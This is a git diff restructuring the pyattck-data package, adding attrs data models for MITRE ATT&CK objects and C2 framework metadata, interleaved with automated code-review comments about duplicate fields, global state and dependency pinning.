b/pyattck_data/__init__.py deleted file mode 100644 index c55db4f..0000000 --- a/pyattck_data/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -from .pyattckdata import PyattckData -from .generatenistdata import GenerateNISTData \ No newline at end of file diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 index 0000000..a1eae06 --- /dev/null +++ b/pyproject.toml 
@@ -0,0 +1,83 @@
+[tool.poetry]
+name = "pyattck-data"
+version = "2.0.1"
+description = "Pyattck Data"
+authors = ["Swimlane "]
+license = "MIT"
+readme = "README.md"
+homepage = "https://github.com/swimlane/pyattck-data"
+repository = "https://github.com/swimlane/pyattck-data"
+classifiers = [
+    "Development Status :: 3 - Alpha",
+]
+
+[tool.poetry.urls]
+Changelog = "https://github.com/swimlane/pyattck-data/releases"
+
+[tool.poetry.dependencies]
+python = "^3.7"
+click = "^8.0.1"
+attrs = "^21.4.0"
+pydantic = "^1.9.1"
+requests = "^2.28.0"
+PyYAML = "^6.0"
+PyGithub = "^1.55"
+xlrd = "^2.0.1"
+Markdown = "<=3.3.6"
+googletrans = "^3.0.0"
+bs4 = "^0.0.1"
+PyNaCl = "^1.5.0"
+importlib-metadata = "<3.8"
+
+[tool.poetry.dev-dependencies]
+pytest = "^7.1.2"
+coverage = {extras = ["toml"], version = "^6.1"}
+safety = "^1.10.3"
+mypy = "^0.910"
+typeguard = "^2.13.2"
+xdoctest = {extras = ["colors"], version = "^1.0.0"}
+sphinx = "^4.3.0"
+sphinx-autobuild = ">=2021.3.14"
+pre-commit = "^2.15.0"
+flake8 = "^4.0.1"
+black = ">=21.10b0"
+flake8-bandit = "^2.1.2"
+flake8-bugbear = "^21.9.2"
+flake8-docstrings = "^1.6.0"
+flake8-rst-docstrings = "^0.2.3"
+pep8-naming = "^0.12.1"
+darglint = "^1.8.1"
+reorder-python-imports = "^2.6.0"
+pre-commit-hooks = "^4.0.1"
+sphinx-click = "^3.0.2"
+Pygments = "^2.10.0"
+pyupgrade = "^2.29.1"
+furo = ">=2021.11.12"
+requests = "^2.27.1"
+
+[tool.poetry.scripts]
+pyattck-data-models = "pyattck_data.__main__:main"
+
+[tool.coverage.paths]
+source = ["src", "*/site-packages"]
+tests = ["tests", "*/tests"]
+
+[tool.coverage.run]
+branch = true
+source = ["pyattck_data", "tests"]
+
+[tool.coverage.report]
+show_missing = true
+fail_under = 100
+
+[tool.mypy]
+strict = true
+warn_unreachable = true
+pretty = true
+show_column_numbers = true
+show_error_codes = true
+show_error_context = true
+
+[build-system]
+requires = ["poetry-core>=1.0.0"]
+build-backend = "poetry.core.masonry.api"
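Review bot: `requests` is declared twice in this file — `requests = "^2.28.0"` under `[tool.poetry.dependencies]` and `requests = "^2.27.1"` under `[tool.poetry.dev-dependencies]` — and the second, looser constraint adds nothing, so the dev-dependencies line should be dropped. `bs4 = "^0.0.1"` resolves to the PyPI shim package whose only purpose is to install beautifulsoup4, which means the parser this project actually imports arrives with no version constraint of the project's own and one extra unpinned link in the supply chain; declare `beautifulsoup4 = "<pinned version range>"` directly and remove `bs4`. The `pyattck-data-models` console script points at `pyattck_data.__main__:main`, which in this commit is a command with no body, so that entry point only serves `--help`/`--version` until it is wired up.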
diff --git a/src/pyattck_data/__init__.py b/src/pyattck_data/__init__.py new file mode 100644 index 0000000..aafb579 --- /dev/null +++ b/src/pyattck_data/__init__.py @@ -0,0 +1,2 @@ +from .pyattckdata import PyattckData +from .generatenistdata import GenerateNISTData diff --git a/src/pyattck_data/__main__.py b/src/pyattck_data/__main__.py new file mode 100644 index 0000000..44b893e --- /dev/null +++ b/src/pyattck_data/__main__.py @@ -0,0 +1,12 @@ +"""Command-line interface.""" +import click + + +@click.command() +@click.version_option() +def main() -> None: + """Pyattck Data.""" + + +if __name__ == "__main__": + main(prog_name="pyattck-data") # pragma: no cover diff --git a/pyattck_data/base.py b/src/pyattck_data/base.py similarity index 83% rename from pyattck_data/base.py rename to src/pyattck_data/base.py index 8be6fb0..2415b6b 100644 --- a/pyattck_data/base.py +++ b/src/pyattck_data/base.py @@ -1,6 +1,6 @@ import abc -from pyattck_data_models import GeneratedData +from .models.generated import GeneratedData class Base: diff --git a/pyattck_data/data/conversion.json b/src/pyattck_data/data/conversion.json similarity index 100% rename from pyattck_data/data/conversion.json rename to src/pyattck_data/data/conversion.json diff --git a/pyattck_data/generatenistdata.py b/src/pyattck_data/generatenistdata.py similarity index 100% rename from pyattck_data/generatenistdata.py rename to src/pyattck_data/generatenistdata.py diff --git a/pyattck_data/githubcontroller.py b/src/pyattck_data/githubcontroller.py similarity index 100% rename from pyattck_data/githubcontroller.py rename to src/pyattck_data/githubcontroller.py diff --git a/pyattck_data/markdowntable.py b/src/pyattck_data/markdowntable.py similarity index 100% rename from pyattck_data/markdowntable.py rename to src/pyattck_data/markdowntable.py diff --git a/src/pyattck_data/models/__init__.py b/src/pyattck_data/models/__init__.py new file mode 100644 index 0000000..e69de29 
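Review bot: `main` in the new `src/pyattck_data/__main__.py` is a click command whose body is only the docstring, so the console script registered for it parses `--help`/`--version` and then returns without doing anything. If that is the intended state for this commit, the docstring should say so, e.g. `"""Pyattck Data. No subcommands are wired up yet; only --version is available."""`; otherwise it should dispatch to the `PyattckData`/`GenerateNISTData` classes that the sibling `__init__.py` hunk exports. The `base.py` hunk in this same line only swaps the import path and needs no change.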
diff --git a/src/pyattck_data/models/actor.py b/src/pyattck_data/models/actor.py new file mode 100644 index 0000000..c1594d9 --- /dev/null +++ b/src/pyattck_data/models/actor.py 
@@ -0,0 +1,91 @@ +from .types import ( + Id, + SemVersion, + MitreDomain +) +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) + + +@define +class Actor(BaseModel): + type: AnyStr = field(validator=validators.in_(['intrusion-set'])) + aliases: List = field(factory=list) + x_mitre_contributors: List = field(factory=list) + revoked: bool = field(factory=bool) + description: AnyStr = field(factory=str) + x_mitre_modified_by_ref: Id = field(factory=Id) + x_mitre_deprecated: bool = field(factory=bool) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + created_by_ref: Id = field(factory=Id) + x_mitre_domains: List[MitreDomain] = field(factory=list) + object_marking_refs: List[Id] = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) + + # These additional properties are from external data sets + names: List = field(factory=list) + #tools: List = field(factory=list) + external_tools: List = field(factory=list) + country: List = field(factory=list) + operations: List = field(factory=list) + links: List = field(factory=list) + targets: List = field(factory=list) + external_description: List = field(factory=list) + attck_id: AnyStr = field(factory=str) + comment: AnyStr = field(factory=str) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def malwares(self): + """ + Returns all malware objects that are known to used by this actor. + + Returns: + [list[Malware]] -- A list of malware objects defined within the + Enterprise MITRE ATT&CK Framework + """ + return self._get_relationship_objects( + parent_id=self.id, + parent_type='malware' + ) + + @property + def tools(self): + """ + Returns all tool objects that are known to used by this actor. 
+ + Returns: + [list[Tool]] -- A list of tool objects defined within the + Enterprise MITRE ATT&CK Framework + """ + return self._get_relationship_objects( + parent_id=self.id, + parent_type='tool' + ) + + @property + def techniques(self): + """ + Returns all technique objects that this actor is known to use. + + Returns: + [list[Technique]] -- A list of technique objects defined within the + Enterprise MITRE ATT&CK Framework + """ + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) diff --git a/src/pyattck_data/models/attack.py b/src/pyattck_data/models/attack.py new file mode 100644 index 0000000..7a8da82 --- /dev/null +++ b/src/pyattck_data/models/attack.py 
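Review bot: `Actor.__attrs_post_init__` repeats, line for line, the hook `BaseModel` already defines in base.py (turning each `external_references` dict into an `ExternalReferences`), so the override can be removed and the inherited one used; the same copy appears in control.py, datacomponent.py, datasource.py, malware.py, mitigation.py and tactic.py. Both versions also assume every entry is a mapping, so an `Actor` built from data whose entries are already `ExternalReferences` instances raises `TypeError` on `ExternalReferences(**item)`; a guard such as `ExternalReferences(**item) if isinstance(item, dict) else item` in the base hook covers both inputs. The `malwares` and `tools` docstrings read "known to used by this actor"; `known to be used by this actor` is meant.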
@@ -0,0 +1,73 @@ +from .types import ( + SemVersion +) +from .base import ( + List, + AnyStr, + define, + field, + BaseAttckModel, + RELATIONSHIP_MAP, + BASE_OBJECTS +) +from .actor import Actor +from .datacomponent import DataComponent +from .datasource import DataSource +from .definition import MarkingDefinition +from .identity import Identity +from .malware import Malware +from .matrix import Matrix +from .mitigation import Mitigation +from .relationship import Relationship +from .tactic import Tactic +from .technique import Technique +from .tool import Tool + + +TYPE_MAP = { + 'intrusion-set': Actor, + 'x-mitre-data-component': DataComponent, + 'x-mitre-data-source': DataSource, + 'marking-definition': MarkingDefinition, + 'identity': Identity, + 'malware': Malware, + 'x-mitre-matrix': Matrix, + 'course-of-action': Mitigation, + 'relationship': Relationship, + 'x-mitre-tactic': Tactic, + 'attack-pattern': Technique, + 'tool': Tool +} + + +@define +class MitreAttck(BaseAttckModel): + type: AnyStr = field() + spec_version: SemVersion = field() + objects: List = field() + relationship_map: dict = field(factory=dict) + + def __attrs_post_init__(self): + if self.objects: + return_list = [] + for item in self.objects: + try: + data = TYPE_MAP.get(item['type'])(**item) + return_list.append(data) + BASE_OBJECTS.append(data) + except TypeError as te: + print(item) + print(te) + raise te + if item['type'] == 'relationship' and item['relationship_type'] != 'revoked-by': + source_id = item['source_ref'] + target_id = item['target_ref'] + if source_id not in RELATIONSHIP_MAP: + RELATIONSHIP_MAP[source_id] = [] + if target_id not in RELATIONSHIP_MAP[source_id]: + RELATIONSHIP_MAP[source_id].append(target_id) + if target_id not in RELATIONSHIP_MAP: + RELATIONSHIP_MAP[target_id] = [] + if source_id not in RELATIONSHIP_MAP[target_id]: + RELATIONSHIP_MAP[target_id].append(source_id) + self.objects = return_list 
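Review bot: `TYPE_MAP.get(item['type'])(**item)` turns an unknown STIX type into a call on `None`, which the `except TypeError` branch then prints and re-raises as "'NoneType' object is not callable" — an opaque failure for what is really unsupported input; resolve the model first, `model = TYPE_MAP.get(item['type'])` / `if model is None: raise ValueError(f"unsupported object type {item['type']!r}")`, and keep the `TypeError` handler for genuine field mismatches. The two `print` calls also dump the whole offending record to stdout; a `logging` call at error level is the right channel for a library. Separately, `BASE_OBJECTS` and `RELATIONSHIP_MAP` are module-level globals appended to on every `MitreAttck` construction, so loading two bundles (or the same one twice) in one process accumulates objects and cross-links relationships between bundles; the `relationship_map` instance field declared here is never written and looks like the per-instance store that was intended.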
diff --git a/src/pyattck_data/models/base.py b/src/pyattck_data/models/base.py new file mode 100644 index 0000000..3b8dcaa --- /dev/null +++ b/src/pyattck_data/models/base.py @@ -0,0 +1,74 @@ +from datetime import datetime +from typing import ( + Any, + AnyStr, + List +) +from pydantic import ( + HttpUrl +) +from attr import ( + define, + field, + validators +) +from .types import ( + PATTERNS, + Id, + MitreRelationship, + SemVersion +) + + +BASE_OBJECTS = [] +RELATIONSHIP_MAP = {} + + +@define +class ExternalReferences: + source_name: AnyStr = field(factory=str) + url: HttpUrl = field(factory=str) + external_id: AnyStr = field(factory=str) + description: AnyStr = field(factory=str) + + +@define +class BaseAttckModel: + id: Id = field() + + +@define(eq=False) +class BaseModel(BaseAttckModel): + id: Id = field() + name: AnyStr = field() + created: datetime = field() + modified: datetime = field() + x_mitre_version: SemVersion = field() + x_mitre_domains: List = field() + + def _get_relationship_objects(self, parent_id: str, parent_type: str) -> list: + return_list = [] + if RELATIONSHIP_MAP.get(parent_id): + for item in RELATIONSHIP_MAP[parent_id]: + for x in BASE_OBJECTS: + if x.id == item and x.type == parent_type and x not in return_list: + return_list.append(x) + return return_list + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + +@define +class BaseRelationship: + id: Id = field() + type: AnyStr = field(validator=validators.in_(['relationship'])) + created: datetime = field() + modified: datetime = field() + source_ref: Id = field() + target_ref: Id = field() + relationship_type: MitreRelationship = field() diff --git a/src/pyattck_data/models/control.py b/src/pyattck_data/models/control.py new file mode 100644 index 0000000..4086670 --- /dev/null +++ b/src/pyattck_data/models/control.py 
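Review bot: `ExternalReferences.url: HttpUrl = field(factory=str)` performs no URL validation — attrs does not act on the annotation and pydantic's `HttpUrl` only validates inside a pydantic model — so whatever string the bundle carries is stored as-is; either attach an attrs validator, e.g. `field(factory=str, validator=validators.matches_re(r'^https?://'))`, or document that `url` is unvalidated. `typing.AnyStr` is a `TypeVar`, not a type, so `str` is the correct hint for these string fields here and in every model module of this commit. `BaseModel.__attrs_post_init__` reads `self.external_references`, which `BaseModel` itself never declares, so a subclass that omits that field fails with `AttributeError` at construction. `_get_relationship_objects` rescans all of `BASE_OBJECTS` for each related id; an id-keyed dict maintained alongside `BASE_OBJECTS` would make each lookup constant time.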
@@ -0,0 +1,33 @@ +from .base import ( + BaseModel, + ExternalReferences, + Id, + List, + AnyStr, + define, + field +) + + +@define +class Control(BaseModel): + revoked: bool = field() + x_mitre_family: AnyStr = field(factory=str) + x_mitre_impact: List = field(factory=list) + x_mitre_priority: AnyStr = field(factory=str) + object_marking_refs: List[Id] = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def techniques(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) diff --git a/src/pyattck_data/models/datacomponent.py b/src/pyattck_data/models/datacomponent.py new file mode 100644 index 0000000..87609a2 --- /dev/null +++ b/src/pyattck_data/models/datacomponent.py 
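Review bot: `Control` declares no `type` field, yet `_get_relationship_objects` in base.py reads `x.type` on every entry of `BASE_OBJECTS`, so a `Control` that ends up in that list would make every relationship lookup raise `AttributeError`; adding `type: AnyStr = field(validator=validators.in_(['course-of-action']))` (with `validators` imported from `.base` as the sibling models do) matches the value nist.py's `ControlObject` already pins. `revoked: bool = field()` is mandatory here while every other model defaults it; `revoked: bool = field(factory=bool)` keeps the models consistent. The `__attrs_post_init__` override is identical to `BaseModel`'s and can be dropped.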
@@ -0,0 +1,44 @@ +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) +from .types import ( + Id, + SemVersion, + MitreDomain +) + + +@define +class DataComponent(BaseModel): + type: AnyStr = field(validator=validators.in_(['x-mitre-data-component'])) + description: AnyStr = field() + created_by_ref: Id = field() + x_mitre_modified_by_ref: Id = field() + x_mitre_data_source_ref: Id = field() + object_marking_refs: List[Id] = field() + x_mitre_domains: List[MitreDomain] = field(factory=list) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + object_marking_refs: List[Id] = field(factory=list) + x_mitre_deprecated: bool = field(factory=bool) + revoked: bool = field(factory=bool) + external_references: List[ExternalReferences] = field(factory=list) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def techniques(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) diff --git a/src/pyattck_data/models/datasource.py b/src/pyattck_data/models/datasource.py new file mode 100644 index 0000000..3b04cf3 --- /dev/null +++ b/src/pyattck_data/models/datasource.py 
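Review bot: `object_marking_refs` is declared twice in `DataComponent`, first as a mandatory `field()` and then with `factory=list`; the later class-body assignment replaces the earlier one, so the mandatory declaration is dead and the field is silently optional. Keep a single line, `object_marking_refs: List[Id] = field(factory=list)`, and delete the other so the intended contract is visible. The `__attrs_post_init__` override duplicates `BaseModel`'s.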
@@ -0,0 +1,58 @@ +from .types import ( + Id, + SemVersion, + MitreDomain, + MitrePlatform +) +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) + + + +@define +class DataSource(BaseModel): + type: AnyStr = field(validator=validators.in_(['x-mitre-data-source'])) + description: AnyStr = field() + x_mitre_modified_by_ref: Id = field() + x_mitre_attack_spec_version: SemVersion = field() + x_mitre_collection_layers: List = field() + x_mitre_domains: List[MitreDomain] = field() + created_by_ref: Id = field() + + external_references: List[ExternalReferences] = field(factory=list) + object_marking_refs: List[Id] = field(factory=list) + aliases: List = field(factory=list) + revoked: bool = field(factory=bool) + x_mitre_deprecated: bool = field(factory=bool) + x_mitre_contributors: List = field(factory=list) + + # not used in ics-attack but used in others + x_mitre_platforms: List[MitrePlatform] = field(factory=list) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def data_components(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='x-mitre-data-component' + ) + + @property + def techniques(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) diff --git a/src/pyattck_data/models/definition.py b/src/pyattck_data/models/definition.py new file mode 100644 index 0000000..66c661f --- /dev/null +++ b/src/pyattck_data/models/definition.py 
@@ -0,0 +1,34 @@ +from datetime import datetime +from attr import validators +from .types import ( + Id, + SemVersion, + PATTERNS +) +from .base import ( + ExternalReferences, + List, + AnyStr, + define, + field +) + + +@define +class Statement: + statement: AnyStr = field() + + +@define +class MarkingDefinition: + type: AnyStr = field(validator=validators.in_(['marking-definition'])) + id: Id = field() + type: AnyStr = field(validator=validators.in_(PATTERNS['types']['examples'])) + created: datetime = field() + definition: Statement = field() + definition_type: AnyStr = field() + + created_by_ref: Id = field(factory=Id) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + object_marking_refs: List = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) \ No newline at end of file diff --git a/src/pyattck_data/models/generated.py b/src/pyattck_data/models/generated.py new file mode 100644 index 0000000..616915c --- /dev/null +++ b/src/pyattck_data/models/generated.py 
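Review bot: `MarkingDefinition.type` is declared twice, first restricted to `'marking-definition'` and then to `PATTERNS['types']['examples']`; the second assignment replaces the first, so the `'marking-definition'` constraint never runs and any type from the examples list is accepted. Keep the specific line, `type: AnyStr = field(validator=validators.in_(['marking-definition']))`, and delete the broader one. `definition: Statement = field()` receives whatever the bundle holds (a dict, given that `MitreAttck` passes `**item` straight through) and attrs does not build a `Statement` from a mapping, so `definition.statement` would raise `AttributeError`; `field(converter=lambda d: d if isinstance(d, Statement) else Statement(**d))` is the minimal fix. The file also lacks a trailing newline.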
@@ -0,0 +1,299 @@ +from datetime import datetime +from hashlib import new +from typing import AnyStr, List + +from attrs import define, field +from pydantic import HttpUrl + + +@define +class Query: + product: AnyStr = field() + query: AnyStr = field() + name: AnyStr = field() + + +@define +class TechniqueCommand: + command: AnyStr = field() + source: HttpUrl = field() + name: AnyStr = field(factory=str) + + +@define +class Technique: + technique_id: AnyStr = field() + command_list: list = field(factory=list) + commands: List[TechniqueCommand] = field(factory=list) + parsed_datasets: list = field(factory=list) + queries: List[Query] = field(factory=list) + possible_detections: list = field(factory=list) + external_reference: list = field(factory=list) + + +@define +class C2Data: + name: AnyStr = field(factory=str) + license: AnyStr = field(factory=str) + price: AnyStr = field(factory=str) + github: AnyStr = field(factory=str) + site: AnyStr = field(factory=str) + twitter: AnyStr = field(factory=str) + evaluator: AnyStr = field(factory=str) + date: AnyStr = field(factory=str) + version: int = field(factory=int) + implementation: AnyStr = field(factory=str) + how_to: AnyStr = field(factory=str) + slingshot: AnyStr = field(factory=str) + kali: AnyStr = field(factory=str) + server: AnyStr = field(factory=str) + implant: AnyStr = field(factory=str) + multi_user: bool = field(factory=bool) + ui: bool = field(factory=bool) + dark_mode: bool = field(factory=bool) + api: bool = field(factory=bool) + windows: bool = field(factory=bool) + linux: bool = field(factory=bool) + macos: bool = field(factory=bool) + tcp: bool = field(factory=bool) + http: bool = field(factory=bool) + http2: bool = field(factory=bool) + http3: bool = field(factory=bool) + dns: bool = field(factory=bool) + doh: bool = field(factory=bool) + icmp: bool = field(factory=bool) + ftp: bool = field(factory=bool) + imap: bool = field(factory=bool) + mapi: bool = field(factory=bool) + smb: bool = 
field(factory=bool) + ldap: bool = field(factory=bool) + key_exchange: bool = field(factory=bool) + stego: bool = field(factory=bool) + proxy_aware: bool = field(factory=bool) + domainfront: bool = field(factory=bool) + custom_profile: bool = field(factory=bool) + jitter: bool = field(factory=bool) + working_hours: bool = field(factory=bool) + kill_date: bool = field(factory=bool) + chaining: bool = field(factory=bool) + logging: bool = field(factory=bool) + in_wild: bool = field(factory=bool) + attck_mapping: bool = field(factory=bool) + dashboard: bool = field(factory=bool) + blog: AnyStr = field(factory=str) + c2_matrix_indicators: AnyStr = field(factory=str) + jarm: bool = field(factory=bool) + actively_maint: bool = field(factory=bool) + slack: bool = field(factory=bool) + slack_members: bool = field(factory=bool) + gh_issues: bool = field(factory=bool) + notes: AnyStr = field(factory=str) + + +@define +class Tool: + names: list = field() + comments: AnyStr = field() + family: list = field(factory=list) + links: list = field(factory=list) + + +@define +class Actor: + country: AnyStr = field() + names: List = field() + targets: AnyStr = field() + operations: List = field() + description: AnyStr = field() + external_tools: List = field() + links: List = field() + attck_id: AnyStr = field() + comment: AnyStr = field() + + +@define +class GeneratedData: + last_updated: datetime = field() + techniques: List[Technique] = field(factory=list) + c2_data: List[C2Data] = field(factory=list) + tools: List[Tool] = field(factory=list) + actors: List[Actor] = field(factory=list) + + @last_updated.default + def default_updated(self): + return str(datetime.now()) + + def add_actor_item(self, country, names, targets, operations, description, tools, links, attck_id, comment): + self.actors.append( + Actor( + country=country, + names=list(set(names)) if names else [], + targets=list(set(targets)) if targets else [], + operations=list(set(operations)) if operations else [], + 
description=description, + external_tools=list(set(tools)) if tools else [], + links=list(set(links)) if links else [], + attck_id=attck_id, + comment=comment + ) + ) + + def add_tool_item(self, names, comments, family, links): + tool = Tool( + names=list(set(names)), + comments=comments, + family=family, + links=list(set(links)) + ) + if self.tools: + if tool not in self.tools: + self.tools.append(tool) + else: + self.tools.append(tool) + + def add_command(self, technique_id, source, name, command): + c = TechniqueCommand( + command=command, + source=source, + name=name + ) + if self.techniques: + found = False + for technique in self.techniques: + if technique.technique_id == technique_id: + found = True + if technique.commands: + if c not in technique.commands: + technique.commands.append(c) + else: + technique.commands.append(c) + + if technique.command_list: + if command not in technique.command_list: + technique.command_list.append(command) + else: + technique.command_list.append(command) + if not found: + self.techniques.append( + Technique( + technique_id=technique_id, + commands=[c], + command_list=[command] + ) + ) + else: + self.techniques.append( + Technique( + technique_id=technique_id, + commands=[c], + command_list=[command] + ) + ) + + def add_dataset(self, technique_id, content): + if self.techniques: + found = False + for technique in self.techniques: + if technique.technique_id == technique_id: + found = True + technique.parsed_datasets.append(content) + if not found: + self.techniques.append( + Technique( + technique_id=technique_id, + parsed_datasets=[content] + ) + ) + else: + self.techniques.append( + Technique( + technique_id=technique_id, + parsed_datasets=[content] + ) + ) + + def add_possible_queries(self, technique_id, product, content, name): + q = Query( + product=product, + query=content, + name=name + ) + if self.techniques: + found = False + for technique in self.techniques: + if technique.technique_id == technique_id: + found = 
True + technique.queries.append(q) + if not found: + self.techniques.append( + Technique( + technique_id=technique_id, + queries=[q] + ) + ) + else: + self.techniques.append( + Technique( + technique_id=technique_id, + queries=[q] + ) + ) + + def add_possible_detection(self, technique_id, data): + if self.techniques: + found = False + for technique in self.techniques: + if technique.technique_id == technique_id: + found = True + technique.possible_detections.append(data) + if not found: + self.techniques.append( + Technique( + technique_id=technique_id, + possible_detections=[data] + ) + ) + else: + self.techniques.append( + Technique( + technique_id=technique_id, + possible_detections=[data] + ) + ) + + def add_external_reference(self, technique_id, reference): + if self.techniques: + found = False + for technique in self.techniques: + if technique.technique_id == technique_id: + found = True + if reference not in technique.external_reference: + technique.external_reference.append(reference) + if not found: + self.techniques.append( + Technique( + technique_id=technique_id, + external_reference=[reference] + ) + ) + else: + self.techniques.append( + Technique( + technique_id=technique_id, + external_reference=[reference] + ) + ) + + def add_c2_data(self, data): + if isinstance(data, dict): + new_dict = {} + for key, val in data.items(): + if key == 'Actively Maint. <12 mo': + new_dict['actively_maint'] = val + elif key == 'att&ck_mapping': + new_dict['attck_mapping'] = val + else: + new_dict[key.replace(' ','_').replace('-', '_').replace('&','').lower()] = val + data = C2Data(**new_dict) + if data not in self.c2_data: + self.c2_data.append(data) diff --git a/src/pyattck_data/models/identity.py b/src/pyattck_data/models/identity.py new file mode 100644 index 0000000..11518c1 --- /dev/null +++ b/src/pyattck_data/models/identity.py 
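Review bot: six `add_*` methods on `GeneratedData` repeat the same find-or-create scan over `self.techniques` with a `found` flag and a duplicated `else` branch that constructs `Technique` twice; a private `_get_or_create_technique` helper reduces each to one or two lines, assuming technique ids are unique within `techniques` (which these methods maintain), and `add_command` and `add_external_reference` keep their dedupe checks on the returned object. `last_updated` is annotated `datetime` but its default returns `str(datetime.now())`, a naive local-time string; `datetime.now(timezone.utc)` (or its `.isoformat()` with the annotation changed to `str`) is what a serialised timestamp should hold. `from hashlib import new` is unused, and `new` is a confusing name to leave in scope.
```python
    def _get_or_create_technique(self, technique_id):
        """Return the Technique registered under technique_id, creating it on first use."""
        for technique in self.techniques:
            if technique.technique_id == technique_id:
                return technique
        technique = Technique(technique_id=technique_id)
        self.techniques.append(technique)
        return technique

    def add_dataset(self, technique_id, content):
        self._get_or_create_technique(technique_id).parsed_datasets.append(content)

    def add_possible_detection(self, technique_id, data):
        self._get_or_create_technique(technique_id).possible_detections.append(data)

    # … unchanged in shape: add_command, add_possible_queries and add_external_reference
    #   call the helper the same way and keep their existing membership checks …
```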
@@ -0,0 +1,26 @@
+from datetime import datetime
+from attr import validators
+from .types import (
+ Id
+)
+from .base import (
+ ExternalReferences,
+ List,
+ AnyStr,
+ define,
+ field
+)
+
+
+@define
+class Identity:
+ id: Id = field()
+ type: AnyStr = field(validator=validators.in_(['identity']))
+ identity_class: AnyStr = field()
+ created: datetime = field()
+ modified: datetime = field()
+ name: AnyStr = field()
+ object_marking_refs: List[Id] = field()
+ roles: List = field(factory=list)
+ sectors: List = field(factory=list)
+ external_references: List[ExternalReferences] = field(factory=list)
diff --git a/src/pyattck_data/models/malware.py b/src/pyattck_data/models/malware.py
new file mode 100644
index 0000000..ed9a09d
--- /dev/null
+++ b/src/pyattck_data/models/malware.py
@@ -0,0 +1,123 @@ +from .types import ( + Id, + SemVersion, + MitreDomain, + MitrePlatform +) +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) + + +@define +class Malware(BaseModel): + type: AnyStr = field(validator=validators.in_(['malware'])) + labels: List = field() + description: AnyStr = field() + + external_references: List[ExternalReferences] = field(factory=list) + object_marking_refs: List[Id] = field(factory=list) + revoked: bool = field(factory=bool) + created_by_ref: Id = field(factory=Id) + x_mitre_deprecated: bool = field(factory=bool) + x_mitre_contributors: List = field(factory=list) + x_mitre_aliases: List = field(factory=list) + x_mitre_platforms: List[MitrePlatform] = field(factory=list) + + # external collected data attributes below + names: List = field(factory=list) + comments: List = field(factory=list) + family: List = field(factory=list) + links: List = field(factory=list) + license: AnyStr = field(factory=str) + price: AnyStr = field(factory=str) + github: AnyStr = field(factory=str) + site: AnyStr = field(factory=str) + twitter: AnyStr = field(factory=str) + evaluator: AnyStr = field(factory=str) + date: AnyStr = field(factory=str) + version: int = field(factory=int) + implementation: AnyStr = field(factory=str) + how_to: AnyStr = field(factory=str) + slingshot: AnyStr = field(factory=str) + kali: AnyStr = field(factory=str) + server: AnyStr = field(factory=str) + implant: AnyStr = field(factory=str) + multi_user: bool = field(factory=bool) + ui: bool = field(factory=bool) + dark_mode: bool = field(factory=bool) + api: bool = field(factory=bool) + windows: bool = field(factory=bool) + linux: bool = field(factory=bool) + macos: bool = field(factory=bool) + tcp: bool = field(factory=bool) + http: bool = field(factory=bool) + http2: bool = field(factory=bool) + http3: bool = field(factory=bool) + dns: bool = field(factory=bool) + doh: bool = field(factory=bool) + icmp: bool = 
field(factory=bool) + ftp: bool = field(factory=bool) + imap: bool = field(factory=bool) + mapi: bool = field(factory=bool) + smb: bool = field(factory=bool) + ldap: bool = field(factory=bool) + key_exchange: bool = field(factory=bool) + stego: bool = field(factory=bool) + proxy_aware: bool = field(factory=bool) + domainfront: bool = field(factory=bool) + custom_profile: bool = field(factory=bool) + jitter: bool = field(factory=bool) + working_hours: bool = field(factory=bool) + kill_date: bool = field(factory=bool) + chaining: bool = field(factory=bool) + logging: bool = field(factory=bool) + in_wild: bool = field(factory=bool) + attck_mapping: bool = field(factory=bool) + dashboard: bool = field(factory=bool) + blog: AnyStr = field(factory=str) + c2_matrix_indicators: AnyStr = field(factory=str) + jarm: bool = field(factory=bool) + actively_maint: bool = field(factory=bool) + slack: bool = field(factory=bool) + slack_members: bool = field(factory=bool) + gh_issues: bool = field(factory=bool) + notes: AnyStr = field(factory=str) + + # used in mobile attack + x_mitre_old_attack_id: AnyStr = field(factory=str) + + # NOT used in mobile attack + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + x_mitre_modified_by_ref: Id = field(factory=Id) + x_mitre_domains: List[MitreDomain] = field(factory=list) + + # used in ICS attack + is_family: bool = field(factory=bool) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def actors(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='intrusion-set' + ) + + @property + def techniques(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) 
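Review bot: `Malware` copies the entire C2-matrix column set (`license` through `notes`, some sixty fields) onto the STIX malware model, duplicating `C2Data` in generated.py field for field; two copies of that schema drift the first time a column is added, and every malware object carries the fields whether or not it is a C2 framework. Composing instead — `c2_data: C2Data = field(default=None)` (or a list of them) populated from the generated data — keeps one definition. The `__attrs_post_init__` override is the same as `BaseModel`'s and can go.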
